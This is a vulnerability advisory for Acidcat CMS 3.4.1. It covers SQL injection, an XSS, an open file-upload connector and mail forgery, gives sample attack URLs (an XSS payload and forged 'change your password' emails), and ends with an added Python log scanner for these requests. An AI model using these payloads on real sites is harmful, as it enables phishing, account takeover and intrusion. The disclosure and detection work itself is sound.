########################## www.BugReport.ir #######################################
#
#      AmnPardaz Security Research Team
#
# Title: Acidcat CMS Multiple Vulnerabilities
# Vendor: www.acidcat.com
# Vulnerable Version: 3.4.1
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/36
###################################################################################


####################
1. Description:
####################
Acidcat CMS is a web site and simple content management system that can be administered through a web browser.

####################
2. Vulnerability:
####################
	2.1. There is a SQL injection in "default.asp". By using it, an attacker can obtain usernames and encrypted passwords.
		2.1.1. POC:
				Check the exploit section.
	2.2. There is a logic flaw that lets an attacker send email through the site without any permission.
		2.2.1. POC:
				Check the exploit section.
	2.3. There is a SQL injection in "main_login2.asp". By using it, an attacker can log in to the site.
		2.3.1. POC:
				Check the exploit section.
	2.4. There is an XSS in "/admin/admin_colors_swatch.asp".
		2.4.1. POC:
				/admin/admin_colors_swatch.asp?field=value='';}alert('XSS');function(){myForm.myText
	2.5. The bundled FCKeditor file manager connector is reachable without any permission check, so an attacker can upload his/her own files.
		2.5.1. POC:
				/admin/fckeditor/editor/filemanager/connectors/test.html
####################
3. Exploits:
####################

Original Exploit URL: http://bugreport.ir/index.php?/36/exploit

	3.1. Attacker can gain usernames and passwords:
	-------------


	-------------
	3.2. Attacker can send email without any permission:
	-------------
default_mail_aspemail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!

default_mail_cdosys.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!

default_mail_jmail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!
	-------------
	3.3. Attacker can login to the site:
	-------------

	-------------
####################
4. Solution:
####################
	Edit the source code to ensure that all inputs are properly sanitized.
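	Until a vendor fix exists, operators can at least watch their web server logs for the requests described in sections 2 and 3. The following Python check is added here and is not part of the advisory or the Acidcat code; it classifies IIS W3C log lines against those indicators. It assumes the field order date time c-ip cs-method cs-uri-stem cs-uri-query sc-status, and the sample lines are constructed.

```python
from urllib.parse import unquote_plus

# Indicators taken from the advisory above. The IIS W3C field order is an
# assumption (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
MAIL_RELAYS = {"/default_mail_aspemail.asp",
               "/default_mail_cdosys.asp",
               "/default_mail_jmail.asp"}
FCK_CONNECTORS = "/admin/fckeditor/editor/filemanager/connectors/"
COLOR_SWATCH = "/admin/admin_colors_swatch.asp"
SQLI_SINK = "/default.asp"
SCRIPT_TOKENS = ("<", "alert(", "}", "function(")

def classify(line):
    """Label one W3C log line with the advisory item it matches, or None."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 7:
        return None  # directive lines or truncated records
    stem, query = fields[4].lower(), fields[5]
    query = unquote_plus(query) if query != "-" else ""
    if stem in MAIL_RELAYS and "acidcatsend=1" in query.lower():
        return "2.2 mail sent through the site without permission"
    if stem.startswith(FCK_CONNECTORS):
        return "2.5 FCKeditor connector reached"
    if stem == COLOR_SWATCH and any(t in query for t in SCRIPT_TOKENS):
        return "2.4 XSS in admin_colors_swatch.asp"
    if stem == SQLI_SINK and "'" in query:  # heuristic: quote in the query
        return "2.1 possible SQL injection in default.asp"
    return None

def scan(lines):
    """Return (client ip, label, uri stem) for every matching log line."""
    hits = []
    for line in lines:
        label = classify(line)
        if label:
            fields = line.split()
            hits.append((fields[2], label, fields[4]))
    return hits

# Constructed sample log lines, not from any real server.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-05-01 10:00:01 203.0.113.5 GET /default.asp id=3 200
2008-05-01 10:00:02 203.0.113.5 GET /default.asp id=3' 500
2008-05-01 10:00:03 198.51.100.9 GET /default_mail_jmail.asp AcidcatSend=1&From=Fake%40Site.com&To=Victim%40Email.com 200
2008-05-01 10:00:04 198.51.100.9 GET /admin/fckeditor/editor/filemanager/connectors/test.html - 200
2008-05-01 10:00:05 192.0.2.77 GET /admin/admin_colors_swatch.asp field=value%3D'';}alert('XSS');function(){ 200
2008-05-01 10:00:06 192.0.2.77 GET /admin/admin_colors_swatch.asp field=blue 200
""".splitlines()
```

	The login injection in "main_login2.asp" (2.3) is not covered because login fields are normally POSTed and never reach cs-uri-query; the quote heuristic for "default.asp" is coarse and will also flag benign apostrophes, so treat it as a lead rather than a verdict.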
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com